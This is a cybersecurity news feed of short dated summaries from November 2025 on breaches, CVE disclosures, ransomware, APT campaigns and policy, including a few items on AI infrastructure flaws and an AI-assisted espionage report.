The nations of Togo and Mozambique have signed a Memorandum of Understanding (MoU) to formalize their cooperation on cybersecurity. The agreement, signed during the inaugural International Cybersecurity Week in Mozambique, establishes a framework for their national Computer Security Incident Response Teams (CSIRTs) to collaborate. The partnership will focus on sharing real-time threat intelligence, conducting joint capacity-building exercises, and coordinating operational responses to cyber incidents, aiming to bolster the digital resilience of both nations and the wider African continent.

Nov 19, 20254 min read

Vendor Breach Exposes Patient Data at Innovative Physical Therapy

Innovative Physical Therapy has notified patients of a data breach that originated from a third-party vendor responsible for practice management. The breach occurred when two vendor employees fell victim to phishing emails, leading to the compromise of their email accounts. Between June 25 and June 26, 2025, an unauthorized party accessed these accounts, which contained the protected health information (PHI) and personally identifiable information (PII) of at least 2,023 patients. The exposed data includes names, Social Security numbers, medical information, and health insurance details.

Nov 19, 20256 min read

Urgent Patch Required: Critical RCE Flaw in W3 Total Cache WordPress Plugin

A critical command injection vulnerability, CVE-2025-9501, with a CVSS score of 9.0, has been found in the W3 Total Cache WordPress plugin, which is active on over one million websites. The flaw allows unauthenticated attackers to achieve remote code execution (RCE) by simply submitting a malicious comment. This enables a complete site takeover. All versions prior to 2.8.13 are affected, and administrators are urged to update immediately.

Nov 18, 20255 min read

Kenyan Government Websites Defaced in Coordinated Cyberattack

On November 17, 2025, a coordinated cyberattack targeted and temporarily disabled numerous Kenyan government websites. The Ministry of Interior and National Administration confirmed the breach, which impacted the websites of the State House and ministries of Health, Education, and Energy, among others. Reports indicate several of the compromised sites were defaced with white supremacist slogans and symbols. The Kenyan government has since restored services and vowed to bring the perpetrators to justice.

Nov 18, 20255 min read

Merck Employee Data Breached in Third-Party Vendor Incident

Pharmaceutical giant Merck has confirmed a data breach impacting its current and former employees due to a cybersecurity incident at a third-party service provider, Graebel Companies. The breach, which occurred in September 2025, was disclosed on November 17. Exposed data includes sensitive PII such as names, Social Security numbers, and financial account information. Merck is offering 24 months of complimentary credit monitoring services to affected individuals.

Nov 18, 20255 min read

WordPress Security Plugin Ironically Contains Critical File-Read Flaw

A critical vulnerability, CVE-2025-11705, has been discovered in the 'Anti-Malware Security and Brute-Force Firewall' WordPress plugin, which is active on over 100,000 sites. The flaw allows any authenticated user, including low-privilege subscribers, to read arbitrary files from the server. This can be exploited to access the sensitive wp-config.php file, leading to a full database compromise and site takeover. Users are urged to update the plugin immediately.

Nov 18, 20255 min read

NSFOCUS Mitigates Massive 843 Gbps DDoS Attack on Critical Infrastructure

Security vendor NSFOCUS has detailed its successful effort to mitigate a massive multi-vector DDoS attack that targeted a critical infrastructure operator in October 2025. The attack peaked at an enormous 843.4 Gbps and 73.6 million packets per second, sustaining high volumes for over 30 minutes. The assault was dominated by a UDP flood, accounting for over 600 Gbps of the traffic. NSFOCUS's Cloud DDoS Protection Service successfully filtered over 99.9% of the malicious traffic, keeping the operator's services online.

Nov 18, 20255 min read

Cl0p Gang Exploits Oracle Zero-Day to Breach Logitech, Washington Post, and More

The notorious Cl0p cyber extortion gang has orchestrated a massive data breach campaign by exploiting a zero-day vulnerability in Oracle's E-Business Suite (EBS), tracked as CVE-2025-61882. Swiss electronics giant Logitech has confirmed it was a victim, filing a data breach notification with the SEC. The campaign has also compromised other major organizations, including The Washington Post, Allianz UK, and GlobalLogic. Cl0p is known for exploiting vulnerabilities in widely-used enterprise software to simultaneously hit a large number of high-value targets, exfiltrating data for double extortion.

Nov 18, 20255 min read

DoorDash Hit by Data Breach After Employee Targeted in Social Engineering Scam

Food delivery service DoorDash has confirmed a data breach after an employee was compromised by a social engineering scam, allowing an unauthorized third party to access internal systems. The breach exposed the names, physical addresses, phone numbers, and email addresses of an undisclosed number of customers in the United States, Canada, Australia, and New Zealand. The company has stated that financial information was not accessed. This incident highlights the persistent threat of attackers targeting the 'human element' to bypass technical security controls.

Nov 17, 20254 min read

Iranian APT 'SpearSpecter' Targets Officials' Families in Sophisticated Espionage Campaign

The Iranian state-sponsored group APT42, also known by aliases like SpearSpecter, is conducting a highly sophisticated and ongoing espionage campaign targeting senior defense and government officials. According to the Israel National Digital Agency, the threat actors are using advanced social engineering tactics, including building trust over weeks and targeting victims' family members to apply psychological pressure. The campaign's technical core is 'TameCat,' a modular PowerShell-based backdoor that operates in-memory and uses legitimate services like Telegram and Discord for stealthy command-and-control.

Nov 17, 20255 min read

Eurofiber Breach Exposes Thales, Orange, and French Government Data in Major Supply Chain Incident

European digital infrastructure provider Eurofiber has confirmed a major data breach in its French division, potentially exposing sensitive data from over 3,600 clients, including major corporations like Thales and Orange, and several French government ministries. A threat actor known as 'ByteToBreach' claims to have exploited vulnerabilities (CVE-2024-29889, CVE-2025-24799) in Eurofiber's GLPI IT asset management software via SQL injection. The stolen data, now for sale on the dark web, allegedly includes highly sensitive information such as SSH private keys, VPN configurations, and API keys, posing a severe supply chain risk.

Nov 17, 20255 min read

Pro-Russian Hackers Target Denmark with DDoS Attacks Ahead of Elections

The pro-Russian hacktivist group NoName057(16) has claimed responsibility for a series of Distributed Denial-of-Service (DDoS) attacks that targeted Danish government websites, political parties, and defense-related entities. The attacks, which occurred just before Denmark's municipal and regional elections, were designed to cause disruption and informational noise. Targets included the Danish Ministry of Transport and the national citizen portal, Borger.dk. While the outages were brief, the incident aligns with a pattern of politically motivated cyber activity by the group against European nations supporting Ukraine.

Nov 17, 20254 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Update

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security flaws, including a zero-day vulnerability in the Windows Kernel (CVE-2025-62215) that is being actively exploited. The flaw is an elevation of privilege vulnerability with a CVSS score of 7.0, allowing a local attacker to gain SYSTEM-level access. The vulnerability affects all supported versions of Windows and Windows Server. Due to its active exploitation in the wild, immediate patching is strongly recommended.

Nov 17, 20253 min read

Critical RCE Flaws in AI Engines From Meta, NVIDIA, Microsoft Discovered

Security researchers have discovered critical remote code execution (RCE) vulnerabilities in widely used AI inference servers from major tech companies, including Meta, NVIDIA, and Microsoft, as well as open-source projects like vLLM. The vulnerabilities stem from the unsafe use of Python's 'pickle' module for data deserialization and exposed ZeroMQ (ZMQ) messaging endpoints. Exploitation could allow attackers to take full control of AI models and servers, posing a significant risk to enterprise AI infrastructure. Some flaws, termed 'Shadow Vulnerabilities,' remain unpatched in production environments.

Nov 16, 20256 min read

RansomHouse Hits H&M and Adidas Supplier in Major Fashion Supply Chain Attack

The RansomHouse ransomware group has attacked Fulgar S.p.A., a major Italian textile manufacturer and a key supplier for global fashion brands like H&M and Adidas. The attack, confirmed on November 3, 2025, resulted in the exfiltration and leak of sensitive corporate data. This incident highlights the significant and growing risk of supply chain attacks in the fashion industry, where a compromise at a single supplier can have cascading impacts on major international retailers.

Nov 16, 20255 min read

Pig Butchering Scams Evolve into Global Cybercrime Menace, FBI Warns

A new threat intelligence report, supported by warnings from the FBI, details the rapid evolution of "Pig Butchering" scams into one of the most economically damaging forms of global cybercrime. These sophisticated, long-con investment schemes leverage social engineering, emotional grooming, and fraudulent cryptocurrency trading platforms to defraud victims of massive sums. The scam involves building a relationship of trust over weeks or months before convincing the victim to invest in a fake, high-yield opportunity.

Nov 16, 20256 min read

APT Caught Exploiting Cisco & Citrix Zero-Days in Sophisticated Attack

Amazon's threat intelligence team has discovered a sophisticated advanced persistent threat (APT) campaign that exploited two separate zero-day vulnerabilities in Cisco Identity Service Engine (CVE-2025-20337) and Citrix products (CVE-2025-5777) before they were publicly known. The attackers used the flaws to gain pre-authentication remote code execution and deployed custom, in-memory malware designed to evade detection. This discovery highlights a growing trend of targeting identity and access management systems at the network edge and underscores the capabilities of highly-resourced threat actors.

Nov 16, 20256 min read

Ransomware Attacks Surge 50% in 2025; Qilin Group Takes the Lead

Cybersecurity researchers report a staggering 50% increase in ransomware attacks in 2025, with over 5,000 incidents claimed on dark web leak sites by late October. This surge occurs amidst a significant realignment in the ransomware ecosystem, with formerly dominant groups fading while new and resurgent actors like Qilin take their place. The Qilin group has been particularly prolific, leading in victim counts for most of the past six months. The United States remains the most targeted nation, and the industrial sector is the most heavily impacted industry. PowerShell has become the primary tool for attackers, used in nearly 78% of observed campaigns.

Nov 15, 20255 min read

Checkout.com Rejects Ransom After ShinyHunters Breach, Donates to Research

The global payment processor Checkout.com has disclosed a data breach orchestrated by the ShinyHunters cybercrime group. The attackers exploited a legacy third-party cloud file storage system that was improperly decommissioned. After being contacted with a ransom demand, Checkout.com refused to pay. In a bold move, the company announced it will instead donate the equivalent ransom amount to cybersecurity research institutions, including Carnegie Mellon University and the University of Oxford. The breach did not impact the core payment platform or cardholder data.

Nov 15, 20254 min read

Fortinet Patches Actively Exploited FortiWeb Zero-Day (CVE-2025-64446)

Fortinet has released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb web application firewall (WAF). The flaw, tracked as CVE-2025-64446, is a relative path traversal vulnerability that allows an unauthenticated remote attacker to execute arbitrary administrative commands by sending specially crafted HTTP/S requests. Due to evidence of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies patch it immediately. The flaw affects a wide range of FortiWeb versions, making immediate patching a top priority for all customers.

Nov 15, 20254 min read

150,000+ Malicious NPM Packages Flood Registry in Crypto Token Farming Scheme

Security researchers from Amazon have uncovered one of the largest package flooding incidents in the history of the npm open-source registry, involving over 150,000 malicious packages. In a novel twist, the campaign was not designed for traditional malicious activities like stealing credentials or deploying ransomware. Instead, the attackers aimed to conduct a large-scale token farming operation by exploiting the incentive system of tea.xyz, a decentralized protocol that rewards open-source developers with 'TEA tokens'. The self-replicating packages automatically generated and published new junk packages, each linked to the attackers' blockchain wallets, polluting the ecosystem and abusing the reward mechanism.

Nov 15, 20254 min read

Critical 9.8 CVSS Auth Bypass Flaw in NVIDIA AIStore Disclosed

The Zero Day Initiative (ZDI) has publicly disclosed a critical authentication bypass vulnerability in NVIDIA's AIStore, an open-source object storage platform for AI applications. The flaw, tracked as CVE-2025-33186, carries a CVSS score of 9.8 and is caused by hard-coded credentials within the platform's authentication component. A remote, unauthenticated attacker could exploit this vulnerability to completely bypass authentication and gain unauthorized access to the system, compromising the confidentiality and integrity of AI models and data. A second, high-severity information disclosure flaw (CVE-2025-33185) was also disclosed.

Nov 15, 20254 min read

CISA Warns Cisco ASA Devices Still Under Attack, Issues New Patch Guidance

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued follow-up implementation guidance for its September Emergency Directive 25-03, which addresses two critical, actively exploited vulnerabilities in Cisco ASA and Firepower devices. The flaws, a remote code execution bug (CVE-2025-20333) and a privilege escalation bug (CVE-2025-20362), are still being targeted by threat actors, including the China-linked group Storm-1849 (ArcaneDoor). CISA warns that many organizations incorrectly applied patches, leaving them vulnerable. The new guidance provides corrective actions and recommends further mitigation for devices that were not updated properly.

Nov 15, 20254 min read

Search Guard FLX Vulnerability (CVE-2025-12149) Allows DLS Bypass

A medium-severity information disclosure vulnerability, CVE-2025-12149, has been disclosed in floragunn's Search Guard FLX, a security plugin for Elasticsearch. The flaw, affecting versions up to 3.1.2, allows an attacker to bypass Document-Level Security (DLS) rules. This occurs specifically when a search is triggered from a Signals watch, an alerting component of the plugin. A low-privileged user who can create or trigger a watch could exploit this to access all documents in queried indices, exposing sensitive data that should be protected by DLS permissions.

Nov 15, 20253 min read

AWS Outage in us-east-1 Knocks Major Global Services Offline

A significant infrastructure fault within Amazon Web Services' (AWS) us-east-1 region in North Virginia on October 20, 2025, triggered a global outage affecting numerous major online services. Platforms including Snapchat, Fortnite, Disney Plus, and various banking applications experienced widespread disruptions. The incident, caused by issues with core services like DynamoDB and EC2, highlights the critical dependency of the digital economy on a few major cloud providers and underscores the importance of robust architectural resilience.

Nov 14, 20256 min read

Palo Alto Firewalls Vulnerable to Remote Reboot Attack via DoS Flaw

Palo Alto Networks has disclosed a medium-severity denial-of-service (DoS) vulnerability, CVE-2025-4619, affecting its PAN-OS software. The flaw enables an unauthenticated, remote attacker to reboot firewalls by sending specially crafted packets. Repeated exploitation can force the device into maintenance mode, disrupting network traffic and disabling security protections. The vulnerability impacts PA-Series and VM-Series firewalls with specific configurations. Patches are available and customers are urged to upgrade.

Nov 14, 20254 min read

Suspected GRU 'Fancy Bear' Hacker Linked to 2016 Election Interference Arrested in Thailand

A Russian national believed to be Aleksey Lukashev, a high-level military intelligence officer in Russia's GRU, has been arrested in Phuket, Thailand. The arrest was part of a joint operation between Thai authorities and the U.S. FBI. Lukashev is one of 12 GRU officers indicted by the U.S. Department of Justice in 2018 for his alleged role in the APT28 (Fancy Bear) hacking operations that targeted Democratic Party organizations during the 2016 U.S. election. He now faces extradition to the United States.

Nov 14, 20253 min read

Team Europe Wins Global Cybersecurity Challenge for Fourth Consecutive Year

For the fourth year in a row, Team Europe has won the International Cybersecurity Challenge (ICC), a prestigious global competition designed to showcase and develop young cybersecurity talent. The event, hosted in Tokyo, Japan, brought together teams from eight regions worldwide. Organized and supported by the EU Agency for Cybersecurity (ENISA), the victory highlights Europe's strong investment in nurturing the next generation of cybersecurity professionals. Team Asia and the US Cyber Team secured second and third place, respectively.

Nov 14, 20252 min read

Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

AI safety and research company Anthropic has reported disrupting what it believes is the first large-scale cyber espionage campaign orchestrated by an AI with a high degree of autonomy. The company detected a threat actor, assessed to be a Chinese state-sponsored group, manipulating its 'Claude Code' AI tool. The AI was used to attempt infiltration of approximately 30 global organizations, including tech companies, financial institutions, and government agencies. The incident marks a significant evolution in the use of AI in offensive cyber operations.

Nov 14, 20254 min read

New Tools From Legit Security and Cyware Tackle AI Code and Ops Risks

As AI adoption accelerates in software development and security, vendors are releasing new solutions to manage the inherent risks. Legit Security has launched 'VibeGuard,' a tool designed to secure AI-generated code within integrated development environments (IDEs). Simultaneously, Cyware has upgraded its 'Quarterback AI' platform to function as an 'AI Fabric' for security operations, aiming to boost threat intelligence and analyst productivity. These launches highlight the industry's focus on both securing AI's use and using AI for defense.

Nov 14, 20253 min read

Patch Now: Microsoft Scrambles to Fix Actively Exploited Windows Kernel Zero-Day

Microsoft has released its November 2025 Patch Tuesday updates, addressing 63 vulnerabilities, including a critical zero-day in the Windows Kernel (CVE-2025-62215) that is being actively exploited in the wild. This privilege escalation flaw allows local attackers to gain full SYSTEM-level control of affected Windows and Windows Server systems. Due to its active exploitation, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies. The update also fixes four other critical flaws, including a severe remote code execution vulnerability (CVE-2025-60724) in the Microsoft Graphics Component.

Nov 13, 20256 min read

GAME OVER: 'Operation Endgame' Dismantles Global Cybercrime Services

In a massive international crackdown dubbed 'Operation Endgame,' law enforcement agencies from 11 countries, coordinated by Europol, have dismantled the infrastructure of three major cybercrime-as-a-service platforms: the Rhadamanthys information stealer, the VenomRAT remote access trojan, and the Elysium botnet. The operation resulted in the seizure of over 1,025 servers, the takedown of 20 domains, and the arrest of the main suspect behind VenomRAT. The targeted malware was responsible for infecting hundreds of thousands of computers worldwide, stealing vast amounts of data, including millions in cryptocurrency.

Nov 13, 20255 min read

Synnovis Confirms Patient Data Stolen in Qilin Ransomware Attack on London Hospitals

Pathology service provider Synnovis has officially confirmed that patient personal data, including names, NHS numbers, and dates of birth, was stolen during the June 2024 ransomware attack attributed to the Qilin gang. The attack caused widespread disruption to London hospitals, leading to the cancellation of over 1,100 procedures. After a lengthy forensic investigation, Synnovis acknowledged the data breach, which followed the attackers leaking approximately 400GB of data. Affected NHS trusts are now beginning the process of notifying individual patients whose information was compromised.

Nov 13, 20256 min read

Retailers Unprepared for AI-Powered Cyberattack Tsunami, Report Warns

A new report from managed security provider LevelBlue reveals a troubling state of cybersecurity in the retail sector. The study found that 44% of retailers have experienced a significant increase in cyberattacks, with many feeling unprepared for the next wave of AI-powered threats. Despite 45% of executives expecting AI-driven attacks, only 25% believe their organization is ready to defend against them. The report also highlights major weaknesses in supply chain security, with nearly half of retailers admitting to having poor visibility into their suppliers' security practices, creating significant risk across the industry.

Nov 13, 20255 min read

Dell Patches Critical 9.1 CVSS Flaw in Data Lakehouse Platform

Dell has released a security update to address a critical vulnerability (CVE-2025-46608) in its Data Lakehouse platform, which received a CVSS score of 9.1. The flaw is an improper access control issue that could be exploited by a remote, high-privileged attacker to gain further elevated rights and potentially compromise the entire system. Due to the severity and the potential for a complete confidentiality, integrity, and availability loss, Dell is urging all customers to upgrade to version 1.6.0.0 immediately.

Nov 13, 20255 min read

CISA KEV Alert: WatchGuard and Triofox Flaws Now Under Active Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The additions include CVE-2025-9242, an out-of-bounds write flaw in WatchGuard Firebox appliances, and CVE-2025-12480, an improper access control vulnerability in Gladinet's Triofox product. The third is the recently disclosed Windows Kernel zero-day, CVE-2025-62215. Federal agencies are now mandated to patch these flaws by a specified deadline, and CISA strongly urges all organizations to prioritize remediation.

Nov 13, 20254 min read

Stealthy Phishing Attack Uses HTML Smuggling & Telegram Bots to Steal Credentials

A sophisticated phishing campaign is targeting organizations across Central and Eastern Europe, using HTML smuggling to deliver credential harvesting forms. Researchers at Cyble discovered the attack, which uses malicious HTML file attachments to bypass email security filters. Once a victim enters their credentials into the fake login page, an embedded JavaScript code exfiltrates the data directly to the attackers' private Telegram channels via the Telegram Bot API. This technique makes the campaign highly evasive, as it avoids the use of traditional, blockable C2 infrastructure.

Nov 13, 20255 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Patch Tuesday

Microsoft's November 2025 Patch Tuesday update addresses 63 vulnerabilities, including a critical Windows Kernel privilege escalation zero-day (CVE-2025-62215) that is being actively exploited in the wild. The flaw, which has a CVSS score of 7.0, allows a local attacker to gain SYSTEM-level privileges. The release also includes patches for four other critical vulnerabilities, notably a remote code execution flaw in the Microsoft Graphics Component (GDI+) with a CVSS score of 9.8 (CVE-2025-60724). Other significant fixes address high-severity issues in Windows Kerberos, Microsoft Office, and Visual Studio, requiring immediate attention from administrators to prevent potential system compromise and supply chain attacks.

Nov 12, 20255 min read

Advanced Threat Actor Exploits Cisco and Citrix Zero-Days in Targeted Attacks on Network Infrastructure

Amazon's threat intelligence team has discovered an advanced threat actor actively exploiting two previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix NetScaler Application Delivery Controllers (ADC). The vulnerabilities, now tracked as CVE-2025-20337 (Cisco) and CVE-2025-5777 (Citrix), are being used to target critical identity and network access control infrastructure. The attackers are leveraging custom malware to gain initial access and establish persistence on these edge devices. Both Cisco and Citrix have been notified and are working on patches, which security teams are urged to apply immediately upon release.

Nov 12, 20255 min read

UK Introduces Sweeping Cyber Security and Resilience Bill to Regulate MSPs and Mandate Stricter Breach Reporting

The UK government has introduced the Cyber Security and Resilience Bill to Parliament, a landmark piece of legislation set to replace the 2018 NIS Regulations. This new bill significantly expands the regulatory landscape by bringing Managed Service Providers (MSPs) into scope for the first time, a move impacting up to 1,100 firms. It also imposes stricter incident reporting rules, requiring an initial report within 24 hours and a full report within 72 hours. The legislation aims to bolster national security by strengthening supply chain resilience and aligning the UK with updated international standards like the EU's NIS2 Directive.

Nov 12, 20254 min read

Clop Ransomware Gang Claims Attack on Dartmouth College, Threatens to Leak Data

The notorious Clop ransomware gang has claimed responsibility for a cyberattack against Dartmouth College, an Ivy League university in the U.S. On November 11, 2025, the group added the institution to its dark web leak site, threatening to publish exfiltrated data if the university does not enter negotiations. This incident highlights the increasing trend of ransomware attacks targeting the education sector, which holds vast amounts of sensitive personal data. Dartmouth College has not yet issued a public statement on the alleged breach, but the threat from Clop is considered highly credible due to the group's track record.

Nov 12, 20255 min read

Iranian APT 'Ferocious Kitten' Continues to Target Dissidents With Custom MarkiRAT Surveillance Malware

The Iranian-aligned APT group 'Ferocious Kitten' continues its long-running cyber-espionage campaign against Iranian dissidents and activists, according to new research from Picus Security. Active since at least 2015, the group uses spear-phishing emails with malicious Office documents to deploy its custom remote access trojan (RAT), MarkiRAT. This malware is a sophisticated surveillance tool, featuring an advanced keylogger that activates only when password managers are not in use, clipboard hijacking, and data exfiltration over HTTP/S. The group also employs various defense evasion techniques, including the use of BITS and the RTLO trick to disguise malicious files.

Nov 12, 20255 min read

Critical Triofox Zero-Day Actively Exploited for System-Level Access

A critical, unauthenticated remote code execution vulnerability (CVE-2025-12480) in Gladinet's Triofox file-sharing platform is being actively exploited by a threat group tracked as UNC6485. The attackers are bypassing authentication by spoofing HTTP Host headers to 'localhost', allowing them to create rogue administrator accounts. They then abuse a built-in antivirus feature to execute malicious code with SYSTEM-level privileges, leading to full system compromise. Post-exploitation activity includes the deployment of commercial remote access tools like Zoho UEMS and AnyDesk to maintain persistence. Gladinet has released a patch, and organizations are urged to update immediately.

Nov 11, 20255 min read

KONNI APT Weaponizes Google's Find Hub for Destructive Attacks

The North Korea-linked threat group KONNI has been observed in a novel campaign targeting individuals in South Korea. The attackers use social engineering to deploy PC malware that steals Google account credentials. With these credentials, they access the victim's Google account and abuse the legitimate 'Find Hub' service (formerly Find My Device) to track the real-time location of the victim's Android phone and remotely trigger a factory reset, wiping all data. This campaign highlights the group's creativity in weaponizing legitimate services for destructive purposes.

Nov 11, 20255 min read

Pentagon Overhauls Cyber Force Model to Boost USCYBERCOM Readiness

The U.S. Department of War (DoW) has announced a new cyber force generation model aimed at enhancing the operational effectiveness, specialization, and lethality of forces assigned to U.S. Cyber Command (USCYBERCOM). The revised plan is designed to create a more integrated and agile cyber force by streamlining the processes of recruiting, training, and retaining personnel across all military branches. This strategic shift seeks to address emerging cyber threats and deter aggression in the cyber domain more effectively.

Nov 11, 20253 min read

Nikkei Slack Breach Exposes Data of 17,000 Users via Stolen Credentials

Japanese media giant Nikkei Inc., owner of the Financial Times, has disclosed a significant data breach affecting its internal Slack workspace. An attacker gained access using authentication credentials stolen from an employee's personal computer, which was infected with infostealer malware. The incident, which was detected in September 2025, exposed the names, email addresses, and chat histories of 17,368 employees and business partners. The breach highlights the persistent threat of infostealer malware and the security risks associated with credentials stored in web browsers.

Nov 11, 20254 min read

Hyundai IT Affiliate Discloses Major Data Breach Exposing PII and SSNs

Hyundai AutoEver America, the IT services subsidiary of the Hyundai Group, has begun notifying customers of a major data breach that occurred between late February and early March 2025. The incident involved unauthorized access to the company's IT environment, exposing highly sensitive personally identifiable information (PII), including full names, driver's license numbers, and Social Security numbers. While the exact number of victims is unconfirmed, the company's software is used in up to 2.7 million vehicles in North America, indicating a potentially massive scale.

Nov 11, 20254 min read

Cisco Firewalls Under Renewed Assault as New DoS Attack Variant Emerges

Cisco has issued an urgent security warning about a new denial-of-service (DoS) attack variant that is actively exploiting two previously patched vulnerabilities, CVE-2025-20333 and CVE-2025-20362, in its Secure Firewall ASA and FTD software. The campaign, which began on November 5, 2025, causes unpatched devices to enter a continuous reload loop, rendering them inoperable. This follows months of active exploitation by advanced threat actors, including a compromise of at least one US government agency. Cisco strongly urges all customers to apply the available patches immediately, as no effective workarounds exist.

Nov 11, 20256 min read

China's Cyber Arsenal Exposed: Knownsec Breach Leaks State Hacking Tools and Global Target Lists

A monumental data breach at Knownsec, a prominent Chinese cybersecurity firm with close government ties, has resulted in the exposure of over 12,000 classified documents. The leak, which occurred in early November 2025, provides an unprecedented view into China's offensive cyber capabilities, revealing a sophisticated arsenal of malware for multiple operating systems, custom hardware attack tools, and an extensive list of global espionage targets. The compromised data details large-scale data theft from countries including India, South Korea, and Taiwan, targeting critical infrastructure, government databases, and telecommunications networks, signaling a major intelligence failure for China's state-sponsored cyber operations.

Nov 10, 20256 min read

Swedish IT Supplier Breach Exposes Personal Data of 1.5 Million Citizens

The 'Datacarry' ransomware group has claimed responsibility for a major cyberattack on Miljödata, a Swedish IT supplier for local governments, exposing the sensitive personal data of up to 1.5 million people. The attack, which occurred in August 2025, targeted the company's HR systems, leading to the theft of names, government IDs, and contact information. The 224MB data archive was subsequently published on the dark web. The breach has caused service disruptions for numerous Swedish municipalities and affected data from major companies like SAS and Volvo. The incident is now under a national privacy investigation for potential GDPR violations.

Nov 10, 20255 min read

EU Governments Under Siege: ENISA Reports Massive Surge in DDoS and Data Attacks

A new threat landscape report from the EU Agency for Cybersecurity (ENISA) reveals that public administrations across the European Union are facing a dramatic increase in cyberattacks. DDoS attacks, largely driven by pro-Russia hacktivist groups like NoName057(16), account for 60% of all incidents, primarily targeting central governments. While disruptive, the report warns that data breaches (17.4%) and ransomware (10%) pose a more significant threat to the continuity of essential public services. ENISA also highlights ongoing espionage campaigns by Russian and Chinese state actors, and notes that the sector's immaturity under the new NIS2 Directive places it in a high-risk zone.

Nov 10, 20255 min read

It's Official: DoD Begins Phased Rollout of CMMC Cybersecurity Program

The U.S. Department of Defense (DoD) has officially started the phased, three-year implementation of its Cybersecurity Maturity Model Certification (CMMC) program as of November 10, 2025. DoD contracting officers can now begin inserting CMMC requirements into new solicitations for the Defense Industrial Base (DIB). The first phase requires contractors handling Federal Contract Information (FCI) or some Controlled Unclassified Information (CUI) to perform self-assessments. More stringent third-party certification requirements for higher CMMC levels will be introduced in subsequent phases, with full implementation expected by late 2028, fundamentally changing the security landscape for all DoD contractors.

Nov 10, 20254 min read

OWASP Top 10 for 2025 Released, Spotlighting Supply Chain and Design Flaws

The OWASP Foundation has released the 2025 release candidate for its influential Top 10 list of web application security risks. This update signals a major shift in focus, with the introduction of new categories like 'A03: Software Supply Chain Failures' and 'A10: Mishandling of Exceptional Conditions'. 'Broken Access Control' remains the top risk, but 'Security Misconfiguration' has climbed to the number two spot. The 2025 list emphasizes a move away from fixing individual bugs towards addressing systemic root causes like insecure design and dependency management, reflecting the modern threat landscape of complex, interconnected applications.

Nov 10, 20254 min read

Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

The Akira ransomware group has added U.S. manufacturer Koch & Co., Inc. to its list of victims. In a November 7 post on its dark web leak site, the group claimed to have stolen 54 gigabytes of sensitive corporate data, including detailed financials, contracts, and HR files. Akira is threatening to publish the data if a ransom is not paid. This attack is characteristic of Akira's double-extortion tactics, targeting mid-sized organizations with data exfiltration followed by encryption. Koch & Co. has not yet issued a public statement on the incident.

Nov 10, 20255 min read

OSCE Guide Urges Unified Cyber-Physical Defense for Critical Infrastructure

The Organization for Security and Cooperation in Europe (OSCE) has published a new technical guide advising governments and operators to adopt a unified approach to securing critical infrastructure. The guide emphasizes the growing convergence of physical and cybersecurity domains, warning that siloed security teams lack a holistic view of modern threats. It highlights how internet-connected Industrial Control Systems (ICS) have expanded the attack surface, making infrastructure vulnerable to remote cyberattacks. The document provides recommendations for integrating intrusion detection, access control, and insider threat management into a single, cohesive security framework.

Nov 10, 20254 min read

Microsoft 'Whisper Leak' Attack Can Spy on Encrypted AI Chats

Microsoft researchers have discovered a novel side-channel attack method named 'Whisper Leak' that undermines the privacy of encrypted AI chatbot conversations. By analyzing the size and timing of encrypted data packets from streaming Large Language Models (LLMs), a passive network observer can accurately infer the topic of a conversation. The proof-of-concept attack achieved over 98% accuracy against models from OpenAI, Mistral, xAI, and DeepSeek. While major AI providers have already implemented mitigations following a responsible disclosure, the finding exposes a fundamental privacy risk in the architecture of streaming LLMs, particularly for users in sensitive sectors like law and healthcare.

Nov 9, 20255 min read

Chinese-Made Electric Buses in Europe & Australia Pose Remote Shutdown Risk

Cybersecurity tests conducted in Norway on November 7, 2025, have uncovered a significant security risk in Chinese-manufactured Yutong electric buses, which are widely used across Europe and Australia. The 'Lion Cage' experiment demonstrated that the buses' connected systems could theoretically be accessed and disabled remotely by the manufacturer. The findings have triggered urgent security reviews by public transit authorities in multiple countries, highlighting the growing national security concerns surrounding internet-connected critical infrastructure and potential vulnerabilities in international supply chains.

Nov 9, 20255 min read

Philippines Lawmakers Push for National Cybersecurity Fund

In the Philippines, Representatives Migz and Luigi Villafuerte have introduced a proposal to create a 'Cybersecurity Risk Management and Mitigation Fund' (CRMMF). This dedicated national fund would provide the government with the necessary resources to prevent and respond to cyberattacks against both public and private sector entities. The proposal comes after recent DDoS attack attempts on local banks and designates 30% of the fund for rapid restoration of critical information infrastructure, signaling a strong political push to enhance the nation's cyber resilience.

Nov 9, 20254 min read

Critical Container Escape Flaws in runC Threaten Docker & Kubernetes

A security alert issued on November 9, 2025, warns of three new critical vulnerabilities in runC, the low-level container runtime used by Docker, Kubernetes, and other major container platforms. The flaws could allow a malicious actor to execute a 'container escape,' breaking out of the isolated container environment to gain unauthorized access to the underlying host operating system. A successful container escape is a worst-case scenario in cloud-native security, as it would allow an attacker to compromise all other containers on the host. Administrators of all containerized environments are urged to monitor for and apply patches immediately.

Nov 9, 20255 min read

Pwn2Own Day 1: Hackers Net $522K for 34 Zero-Days in SOHO Devices

The first day of Trend Micro's Pwn2Own Ireland 2025 competition was a resounding success for security researchers, who earned a total of $522,500 for demonstrating 34 unique zero-day vulnerabilities. In a stunning display, every single one of the 17 scheduled attempts against popular SOHO devices—including printers, NAS devices, and smart home products from brands like QNAP, Synology, Canon, and HP—was successful. The highlight was a complex 'SOHO Smashup' that chained eight bugs to compromise a router and a NAS device.

Nov 8, 20255 min read

Over 75% of Orgs Can't Keep Pace with AI-Powered Attacks, Survey Finds

A new survey from CrowdStrike reveals a stark reality: 76% of global organizations admit they cannot match the speed and sophistication of AI-powered cyberattacks. The 2025 State of Ransomware Survey highlights a dangerous 'confidence illusion,' where leaders believe they are prepared, yet 78% of their organizations were attacked in the past year. With adversaries using AI to accelerate attacks, 89% of security leaders now agree that AI-powered protection is essential to close the widening security gap and defend against modern threats.

Nov 8, 20255 min read

Malicious VS Code Extension with Ransomware Capabilities Discovered on Official Marketplace

